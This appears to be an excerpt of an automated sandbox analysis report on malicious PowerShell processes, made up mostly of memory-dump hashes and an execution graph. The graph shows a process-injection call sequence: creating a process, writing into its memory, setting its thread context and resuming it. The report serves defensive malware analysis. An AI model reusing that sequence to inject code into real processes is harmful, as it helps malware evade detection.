                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AB14B70E00609CFDF14CFA9D885B9EBBF6BF88754F148529E815A7290EB749846CF81
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 748c022e4533e08519729d538e90d7805feac9dde098e03af33e8cfdae67d464
                                                                                                                                                                                                                                                        • Instruction ID: 60c045e512c9d9b848faa3e3f0a299a11f94020e7ad2108bb2dc3876fd805895
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 748c022e4533e08519729d538e90d7805feac9dde098e03af33e8cfdae67d464
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84B16C70E002098FDF14CFA9D885BAEBBF5BF48354F24852AD814A7294EB749885CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2437bb089ce5d69318a947b6a9e97ba66d44c270772b9827789557896521ac71
                                                                                                                                                                                                                                                        • Instruction ID: 6a152b67f8139a32602a21ce7e19cc5864f166777d0a4b478445c47056720970
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2437bb089ce5d69318a947b6a9e97ba66d44c270772b9827789557896521ac71
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BA17D74A002098FCB08CFA9C494EAAFBB1FF88314B258669D515AB361C732ED51CF94
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: be637e9a188b739c85c1d9dcb47a732d7db6ad3c0e6c13abcee77a7caf03efd3
                                                                                                                                                                                                                                                        • Instruction ID: c0d9dd03f2ce716b89ca20502b40a772ce66ddbcf7f8d46270238f6ad71b2691
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be637e9a188b739c85c1d9dcb47a732d7db6ad3c0e6c13abcee77a7caf03efd3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F17169B1E002099FDF14DFA9D885B9EBBF6BF88714F248529E814A7350EB749841CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 47d29582ce734658d8cc80bc5dfcad4f51f51e2447f23c935bd90d345e885f67
                                                                                                                                                                                                                                                        • Instruction ID: 9036039531cc9a897b3efa31bf45d6179fdec1d0c4200ef42fb29858d851dbfd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47d29582ce734658d8cc80bc5dfcad4f51f51e2447f23c935bd90d345e885f67
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56716AB0E002099FDF14CFA9D895B9EBBF6BF88314F248529E415A7394EB749841CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5e7e481c13f5f1e1f933f14f0e3c3fcb1db4d40acee03d4edff2ac24b7eb262f
                                                                                                                                                                                                                                                        • Instruction ID: 0f52ba039a1e4df402fe1ed7a6c48cfd09f8fbc8f1d18ad06b51c54bca61be06
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7e481c13f5f1e1f933f14f0e3c3fcb1db4d40acee03d4edff2ac24b7eb262f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C615C35A04258DFDB05CFA8D480A9CFBB1FF49320F25819AE855AB762C731EE41CB91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3c5d1d72f94c0d0bf600cc9c495c1f51f765b1794c8ec947eb02af7200cba763
                                                                                                                                                                                                                                                        • Instruction ID: 6dc57ace3567ba6e665d23b9af4533883c9e1b2b9f85e6f5b7351a5cacc51de2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c5d1d72f94c0d0bf600cc9c495c1f51f765b1794c8ec947eb02af7200cba763
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50412C74A006099FDB09CF59C494EAAFBB1FF48314B258259D825AB354C732FD51CFA4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a6a5760f9fefd06bd3b322b63461cda383ba159388ea868a10d2bbd552e5cdef
                                                                                                                                                                                                                                                        • Instruction ID: a3432a2b1ba1d3a65f5472eb51665ae251e92f9a9a6f005d349ae7acc7e622ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6a5760f9fefd06bd3b322b63461cda383ba159388ea868a10d2bbd552e5cdef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D4113B1D00348EFDB14CFA9D484ADEBBF5EF49314F20842AE819AB210DB75A945CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2834f6b7fc5625d40fd4adb74eef5318b44c68d7d91254b1c582bb43a2cd2251
                                                                                                                                                                                                                                                        • Instruction ID: a6eec4847148340694f95dd86d4e2ac905384808b5917c33c962b76f7a1d19f6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2834f6b7fc5625d40fd4adb74eef5318b44c68d7d91254b1c582bb43a2cd2251
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 014114B1D00348EFDB14CFA9D484ADEBBF5EF49314F20842AE819AB250DB74A945CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 98a2d50b8196e71cb8cac22d58e8979dabd14581b32f77fc8b6979109d32c460
                                                                                                                                                                                                                                                        • Instruction ID: 933ab83e8d79f2959760e12986c8b90ac4ebe6ab9aeac9940a3ba98b84922836
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98a2d50b8196e71cb8cac22d58e8979dabd14581b32f77fc8b6979109d32c460
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F319E35A093558FDB06CF68C8A09A9BBB1FF4A310B2582D7D444EB362C335ED45CBA5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8177208a69dde33760054b5753c6019b8fad391d53c81dd9b564f0aca17b6983
                                                                                                                                                                                                                                                        • Instruction ID: 97680267b02607d2961b60f8ae0dfa2b62ea542209fc9a554ea46b0258323976
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8177208a69dde33760054b5753c6019b8fad391d53c81dd9b564f0aca17b6983
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17313974A006199FCB04DF69D880DAAFBB1FF49310B218199E509EB751C735ED41CBA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 34bd9a8efad1b41921d588cddeb63bab4433098e74c6f0dbf189b548467d4cf0
                                                                                                                                                                                                                                                        • Instruction ID: e889d621c959575062c794db0eff80a4ecccaf0130fa4795c8c318181ab549de
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34bd9a8efad1b41921d588cddeb63bab4433098e74c6f0dbf189b548467d4cf0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2110270C04148CFCF38DE98D889BEDB779BF44719F141429D001B2191AF749C8ACB01
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56216600585.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_940000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 68868c17dd9ff68a907ba34e7b152514a96f3d701c5d00f4299a9c6e94057df7
                                                                                                                                                                                                                                                        • Instruction ID: c82bdcf5781d27039b567cffacf7fbf9923a8936c9f1d5ae8d7c7afc2878ae1c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68868c17dd9ff68a907ba34e7b152514a96f3d701c5d00f4299a9c6e94057df7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48916C70E0420D9FDF14CFE9D981BAEFBF6AF88314F148569E405A7294EB349845CB91
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 4[,j$4[,j$4[,j$4[,j$4\,j$4\,j$@b,j$@b,j$@b,j$@b,j
                                                                                                                                                                                                                                                        • API String ID: 0-2700156477
                                                                                                                                                                                                                                                        • Opcode ID: 0fc22a026a97f646a433cdd7214001793bd2e704ced693b9ed513e84a7fedc14
                                                                                                                                                                                                                                                        • Instruction ID: 3714e785a81ecb2c9a8a49076e71ad39474b5615f937f5f6fed2d6ac7ec6fbfb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fc22a026a97f646a433cdd7214001793bd2e704ced693b9ed513e84a7fedc14
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2E104B0B40308AFEB58DB64C454B6EBBF2AF85304F608279D416AF395DA71DC41DB92
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.56224159637.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: P0*j$G,j$dgt$dgt
                                                                                                                                                                                                                                                        • API String ID: 0-2998615682
                                                                                                                                                                                                                                                        • Opcode ID: d38e02ad9ad3bc28a5cea12707e0082d90229b44a3c8a374cd4faf96fa98ccbc
                                                                                                                                                                                                                                                        • Instruction ID: 66369a3c5a17b88e638383758767cb94e0304e67aa45a7ca171be2a884696559
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d38e02ad9ad3bc28a5cea12707e0082d90229b44a3c8a374cd4faf96fa98ccbc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D951A2B5B01206DFDF648F55C444BBEB7E2AF89220F248279E9159B290DB32DC81DB51

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:5.4%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:8.7%
                                                                                                                                                                                                                                                        Total number of Nodes:263
                                                                                                                                                                                                                                                        Total number of Limit Nodes:28
                                                                                                                                                                                                                                                        execution_graph 77700 6c980d8 77701 6c980ed 77700->77701 77709 6c98109 77701->77709 77713 6c981a7 77701->77713 77717 6c9845b 77701->77717 77721 6c98405 77701->77721 77725 6c98118 77701->77725 77729 6c984ab 77701->77729 77702 6c98103 77711 6c98118 77709->77711 77710 6c98187 77710->77702 77711->77710 77733 6c99b39 77711->77733 77715 6c9816f 77713->77715 77714 6c98187 77714->77702 77715->77714 77716 6c99b39 8 API calls 77715->77716 77716->77715 77719 6c9816f 77717->77719 77718 6c98187 77718->77702 77719->77718 77720 6c99b39 8 API calls 77719->77720 77720->77719 77723 6c9816f 77721->77723 77722 6c98187 77722->77702 77723->77722 77724 6c99b39 8 API calls 77723->77724 77724->77723 77727 6c98142 77725->77727 77726 6c98187 77726->77702 77727->77726 77728 6c99b39 8 API calls 77727->77728 77728->77727 77731 6c9816f 77729->77731 77730 6c98187 77730->77702 77731->77730 77732 6c99b39 8 API calls 77731->77732 77732->77731 77734 6c99b5d 77733->77734 77737 6c99fa1 77734->77737 77738 6c9a0fc 77737->77738 77739 6c99c03 77737->77739 77742 6c9a560 77738->77742 77753 6c9a550 77738->77753 77743 6c9a575 77742->77743 77764 6c9a9fa 77743->77764 77769 6c9af94 77743->77769 77774 6c9ad95 77743->77774 77780 6c9a7b5 77743->77780 77785 6c9ab10 77743->77785 77790 6c9ac42 77743->77790 77795 6c9b4ed 77743->77795 77800 6c9a8ce 77743->77800 77754 6c9a575 77753->77754 77756 6c9a9fa 2 API calls 77754->77756 77757 6c9b4ed 2 API calls 77754->77757 77758 6c9a8ce 2 API calls 77754->77758 77759 6c9ab10 2 API calls 77754->77759 77760 6c9ac42 2 API calls 77754->77760 77761 6c9ad95 2 API calls 77754->77761 77762 6c9a7b5 2 API calls 77754->77762 77763 6c9af94 2 API calls 77754->77763 77755 6c9a597 77755->77739 77756->77755 77757->77755 77758->77755 77759->77755 77760->77755 77761->77755 77762->77755 77763->77755 77765 6c9b06f 77764->77765 77766 6c9a680 77764->77766 77805 6c9e838 77765->77805 77809 6c9e831 77765->77809 77770 6c9afa3 77769->77770 77813 6c9f0e0 77770->77813 77817 6c9f0d8 77770->77817 77771 6c9a597 77771->77739 77776 6c9adae 77774->77776 77775 6c9a680 77776->77775 77821 6c9f750 77776->77821 77825 6c9f758 77776->77825 77777 6c9b30a 77781 6c9a7bb 77780->77781 77783 6c9f0d8 WriteProcessMemory 77781->77783 77784 6c9f0e0 WriteProcessMemory 77781->77784 77782 6c9a680 77783->77782 77784->77782 77786 6c9ab28 77785->77786 77788 6c9f0d8 WriteProcessMemory 77786->77788 77789 6c9f0e0 WriteProcessMemory 77786->77789 77787 6c9a680 77788->77787 77789->77787 77791 6c9ac4e 77790->77791 77829 6c9be18 77791->77829 77834 6c9be28 77791->77834 77792 6c9a680 77796 6c9b4fc 77795->77796 77798 6c9e838 Wow64SetThreadContext 77796->77798 77799 6c9e831 Wow64SetThreadContext 77796->77799 77797 6c9a680 77798->77797 77799->77797 77801 6c9b2ce 77800->77801 77803 6c9f758 NtResumeThread 77801->77803 77804 6c9f750 NtResumeThread 77801->77804 77802 6c9b30a 77803->77802 77804->77802 77806 6c9e87d Wow64SetThreadContext 77805->77806 77808 6c9e8c5 77806->77808 77808->77766 77810 6c9e838 Wow64SetThreadContext 77809->77810 77812 6c9e8c5 77810->77812 77812->77766 77814 6c9f128 WriteProcessMemory 77813->77814 77816 6c9f17f 77814->77816 77816->77771 77818 6c9f128 WriteProcessMemory 77817->77818 77820 6c9f17f 77818->77820 77820->77771 77822 6c9f7a0 NtResumeThread 77821->77822 77824 6c9f7d5 77822->77824 77824->77777 77826 6c9f7a0 NtResumeThread 77825->77826 77828 6c9f7d5 77826->77828 77828->77777 77830 6c9be22 77829->77830 77832 6c9be8d 77829->77832 77838 6c9c5f4 77830->77838 77832->77792 77835 6c9be3f 77834->77835 77837 6c9c5f4 2 API calls 77835->77837 77836 6c9be61 77836->77792 77837->77836 77839 6c9c603 77838->77839 77843 6c9e12a 77839->77843 77847 6c9e130 77839->77847 77844 6c9e130 CreateProcessA 77843->77844 77846 6c9e31c 77844->77846 77848 6c9e194 CreateProcessA 77847->77848 77850 6c9e31c 77848->77850 77604 6c65580 77606 6c65598 77604->77606 77605 6c656a3 77606->77605 77623 6b2d0c 77606->77623 77627 6b2755 77606->77627 77632 6b2655 77606->77632 77637 6b26f5 77606->77637 77642 6b2893 77606->77642 77647 6b1c52 77606->77647 77651 6b2853 77606->77651 77656 6b2833 77606->77656 77661 6b2bff 77606->77661 77665 6b2873 77606->77665 77670 6b1bfa 77606->77670 77674 6b28f8 77606->77674 77679 6b26a5 77606->77679 77684 6b257b 77606->77684 77689 6b27a0 77606->77689 77694 6b26e5 77606->77694 77624 6b2c66 WriteProcessMemory 77623->77624 77626 6b2e04 77624->77626 77626->77605 77628 6b2766 77627->77628 77629 6b282b 77628->77629 77630 6b2dc9 WriteProcessMemory 77628->77630 77629->77605 77631 6b2e04 77630->77631 77631->77605 77636 6b265a 77632->77636 77633 6b282b 77633->77605 77634 6b2dc9 WriteProcessMemory 77635 6b2e04 77634->77635 77635->77605 77636->77633 77636->77634 77641 6b2705 77637->77641 77638 6b282b 77638->77605 77639 6b2dc9 WriteProcessMemory 77640 6b2e04 77639->77640 77640->77605 77641->77638 77641->77639 77646 6b2899 77642->77646 77643 6b286b 77643->77605 77644 6b2dc9 WriteProcessMemory 77645 6b2e04 77644->77645 77645->77605 77646->77643 77646->77644 77648 6b2d68 WriteProcessMemory 77647->77648 77650 6b2e04 77648->77650 77650->77605 77655 6b2856 77651->77655 77652 6b286b 77652->77605 77653 6b2dc9 WriteProcessMemory 77654 6b2e04 77653->77654 77654->77605 77655->77652 77655->77653 77660 6b2834 77656->77660 77657 6b2830 77657->77605 77658 6b2dc9 WriteProcessMemory 77659 6b2e04 77658->77659 77659->77605 77660->77657 77660->77658 77664 6b2b5d WriteProcessMemory 77661->77664 77663 6b2e04 77663->77605 77664->77663 77666 6b2874 77665->77666 77667 6b286b 77666->77667 77668 6b2dc9 WriteProcessMemory 77666->77668 77667->77605 77669 6b2e04 77668->77669 77669->77605 77671 6b1c05 WriteProcessMemory 77670->77671 77673 6b2e04 77671->77673 77673->77605 77678 6b2904 77674->77678 77675 6b2986 77675->77605 77676 6b2dc9 WriteProcessMemory 77677 6b2e04 77676->77677 77677->77605 77678->77675 77678->77676 77683 6b26a2 77679->77683 77680 6b282b 77680->77605 77681 6b2dc9 WriteProcessMemory 77682 6b2e04 77681->77682 77682->77605 77683->77679 77683->77680 77683->77681 77685 6b257e 77684->77685 77686 6b255f 77685->77686 77687 6b2dc9 WriteProcessMemory 77685->77687 77686->77605 77688 6b2e04 77687->77688 77688->77605 77693 6b27a1 77689->77693 77690 6b282b 77690->77605 77691 6b2dc9 WriteProcessMemory 77692 6b2e04 77691->77692 77692->77605 77693->77690 77693->77691 77695 6b26ea 77694->77695 77696 6b26a2 77694->77696 77697 6b282b 77696->77697 77698 6b2dc9 WriteProcessMemory 77696->77698 77697->77605 77699 6b2e04 77698->77699 77699->77605 77870 6c77370 77871 6c77385 77870->77871 77876 6c77574 77871->77876 77882 6c773a0 77871->77882 77888 6c773b0 77871->77888 77872 6c7739b 77878 6c77405 77876->77878 77877 6c7743c 77877->77872 77878->77877 77879 6c775b1 77878->77879 77894 6c77898 77878->77894 77879->77877 77881 6c77898 6 API calls 77879->77881 77881->77879 77883 6c773ad 77882->77883 77884 6c7743c 77883->77884 77885 6c775b1 77883->77885 77887 6c77898 6 API calls 77883->77887 77884->77872 77885->77884 77886 6c77898 6 API calls 77885->77886 77886->77885 77887->77883 77889 6c773da 77888->77889 77890 6c7743c 77889->77890 77891 6c775b1 77889->77891 77892 6c77898 6 API calls 77889->77892 77890->77872 77891->77890 77893 6c77898 6 API calls 77891->77893 77892->77889 77893->77891 77895 6c778a5 77894->77895 77902 6c78294 77895->77902 77907 6c78d22 77895->77907 77912 6c78319 77895->77912 77917 6c784f2 77895->77917 77922 6c783b2 77895->77922 77903 6c782a3 77902->77903 77927 6c90b50 77903->77927 77931 6c90b44 77903->77931 77908 6c78294 77907->77908 77909 6c779ee 77907->77909 77910 6c90b50 CreateFileA 77908->77910 77911 6c90b44 CreateFileA 77908->77911 77910->77909 77911->77909 77913 6c78328 77912->77913 77935 6c91228 77913->77935 77939 6c91220 77913->77939 77914 6c78356 77918 6c783bb 77917->77918 77919 6c779ee 77917->77919 77943 6c90ead 77918->77943 77947 6c90eb8 77918->77947 77923 6c783ba 77922->77923 77925 6c90eb8 CreateFileMappingA 77923->77925 77926 6c90ead CreateFileMappingA 77923->77926 77924 6c779ee 77925->77924 77926->77924 77928 6c90ba2 CreateFileA 77927->77928 77930 6c90c4b 77928->77930 77932 6c90ba2 CreateFileA 77931->77932 77934 6c90c4b 77932->77934 77936 6c91268 MapViewOfFile 77935->77936 77938 6c912a5 77936->77938 77938->77914 77940 6c91228 MapViewOfFile 77939->77940 77942 6c912a5 77940->77942 77942->77914 77944 6c90f0d CreateFileMappingA 77943->77944 77946 6c90fb1 77944->77946 77948 6c90f0d CreateFileMappingA 77947->77948 77950 6c90fb1 77948->77950 77950->77950 77851 6c651a8 77852 6c651d3 77851->77852 77853 6c65218 77852->77853 77854 6b2d0c WriteProcessMemory 77852->77854 77855 6b27a0 WriteProcessMemory 77852->77855 77856 6b26e5 WriteProcessMemory 77852->77856 77857 6b26a5 WriteProcessMemory 77852->77857 77858 6b257b WriteProcessMemory 77852->77858 77859 6b1bfa WriteProcessMemory 77852->77859 77860 6b28f8 WriteProcessMemory 77852->77860 77861 6b2bff WriteProcessMemory 77852->77861 77862 6b2873 WriteProcessMemory 77852->77862 77863 6b2853 WriteProcessMemory 77852->77863 77864 6b2833 WriteProcessMemory 77852->77864 77865 6b2893 WriteProcessMemory 77852->77865 77866 6b1c52 WriteProcessMemory 77852->77866 77867 6b2655 WriteProcessMemory 77852->77867 77868 6b26f5 WriteProcessMemory 77852->77868 77869 6b2755 WriteProcessMemory 77852->77869 77854->77853 77855->77853 77856->77853 77857->77853 77858->77853 77859->77853 77860->77853 77861->77853 77862->77853 77863->77853 77864->77853 77865->77853 77866->77853 77867->77853 77868->77853 77869->77853
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 4
                                                                                                                                                                                                                                                        • API String ID: 0-4088798008
                                                                                                                                                                                                                                                        • Opcode ID: 10e707f254e4a66bf5b0ad32cc6fc231cd424513764116b37be16684a145e027
                                                                                                                                                                                                                                                        • Instruction ID: f45f94f0d6f6acd2d61c1964f7e84f9f2b19cde17ec265d44a3163a656aeedb6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10e707f254e4a66bf5b0ad32cc6fc231cd424513764116b37be16684a145e027
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CB22874A00228CFDB54CFA9C894BADB7B6BF48301F158199E505AB3A5DB71EE81CF50
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193151493.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c30000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 4
                                                                                                                                                                                                                                                        • API String ID: 0-4088798008
                                                                                                                                                                                                                                                        • Opcode ID: d5174a8e6e8e784059e8e8615b01b640b380642bc72bdb2e13d04d4433bf7968
                                                                                                                                                                                                                                                        • Instruction ID: f59dc5a868bdeb5ea6a2eb55757663127c0130ccca5bc40f6217bb4ec695ee23
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5174a8e6e8e784059e8e8615b01b640b380642bc72bdb2e13d04d4433bf7968
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61220C74A00228CFDB64DF65C994BADB7B2BF48305F148199E509AB3A5DB31DE81CF50
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • NtResumeThread.NTDLL(?,?), ref: 06C9F7C6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                        • Opcode ID: 4ff153c0901ad12ce252155b5ac2b98a9d8c0fdd04c0f4bdb27d9b786ed899b4
